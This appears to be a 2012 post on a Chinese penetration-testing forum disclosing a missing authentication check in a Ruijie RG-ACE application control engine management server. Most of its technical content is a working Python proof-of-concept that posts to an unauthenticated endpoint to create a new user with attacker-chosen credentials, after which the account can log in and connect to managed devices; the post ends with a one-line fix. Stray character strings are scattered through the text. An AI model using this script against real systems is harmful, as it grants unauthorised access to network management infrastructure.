找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
返回列表 发新帖
查看: 2379|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)* f$ {6 U& X1 Z6 i5 W, x
1 X5 C9 i. R3 [

6 {  o9 w/ h1 g4 L+ Q1 l: x测试的具体版本是. E6 G4 W$ z, ?7 F
产品名称: 锐捷应用控制引擎. f+ c5 ^+ N% p, G/ `3 r
版本号: 3.1.36.001 TC
5 r$ \. ~) Z: W! W4 n  w编译时间: 201104291730
; W2 x+ |5 P+ z  e6 K 0 E& w; w' X' C$ \; x' }7 ^
- h! [. }+ E3 x# m: {" o
漏洞证明:$ o; Y3 e3 z9 M5 |7 M

3 z% O# s5 W0 p* e! P1 f" y9 X% X! p+ _* c4 l% @
+ Q: L5 M3 s$ F4 P+ J  \8 J

: U- r# Y9 P6 `4 `& H& w% R) }3 `( A+ ?# M% _! d( m6 r
$ a- n0 d/ I- ^7 r# o
执行脚本
! b$ }! c* D3 I: O9 e#! /usr/bin/env python9 S' R: Q/ D) M/ {" p: l- c
#coding=gbk
! a9 Z) ^# }  v- L#RG-ACE管理服务器 V3.1.36.001
% I! M( j: k5 F, I( f4 Nimport urllib2, urllib,cookielib
' A2 x! L& H& eurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
, k/ T  Z* k- g# l% Z) Nopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
3 l" Z6 i! m% H6 S* ~9 ?8 ^: L5 [! M2 Aopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
& q/ s* D. K6 m" b* N3 upost=(("event","userManager.doInsertUserInfo"),  T/ v2 c. Q! @2 P) A
("useractionname","addButtonValue"),1 S. n' I% O4 L1 O: M6 H% L2 t
("useropermanager","userManager"),
/ b7 Y4 z" N6 t8 v" U' Q, t("userName","t"), #######账号自己加3 Q2 f# z' Q2 x
("pwd","aaaaaa"),######密码自己加8 u" y7 b3 Q" b$ L
("trueName","ad"),
$ N/ T# u4 G) e. ^- M("email",""),# I( J& _2 B: O; H' X# I& U3 M! z
("mobilePhone",""),. z: c. F- Y2 r$ ?  g6 L9 A6 ~% e
("officePhone",""),7 c& L* k3 b: Q
("addr",""),
, K" y3 h6 e/ v# x* `("submit","确定"))
" h/ u6 ?( _; U2 Surllib2.install_opener(opener)
' V6 ]( D" _# D# zp=urllib2.urlopen(url, urllib.urlencode(post)).read()
! f2 T3 _* K+ a/ G1 xprint "Done"
  R2 Q* L+ p. t8 U0 W4 j* z! Q, G& x6 ]4 y* x& a* w; L' m- |- Q% ^
登录,连接设备; W& |; |4 I. t; m" w% ^9 {: ?

& l$ }) y. v& R3 }* ?: G' S9 h: v2 d; \
9 I: i, l% t4 c  J, f
5 z* y8 H( c' ~6 e% K4 L% m9 s
: F8 a- V( e1 W
默认的管理员admin权限更大点$ C1 n  r0 a( l& _4 ~8 B+ G
, `5 z# x; V' L( a' ]  o" @) U& [- W
! }7 w) X: V1 V) A( L  h1 X, C; e$ p

. E2 o& `1 q2 \9 Y3 l
- g9 N, Q. ]* h+ Z1 ~- H  r  P, v' e: [1 c8 Y- ]! S1 u9 ]
修复方案:4 K. O& w: S3 |. _! ]
加强对接口的权限验证2 q# X; K7 b$ P! L

5 e+ F$ M7 H. e
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表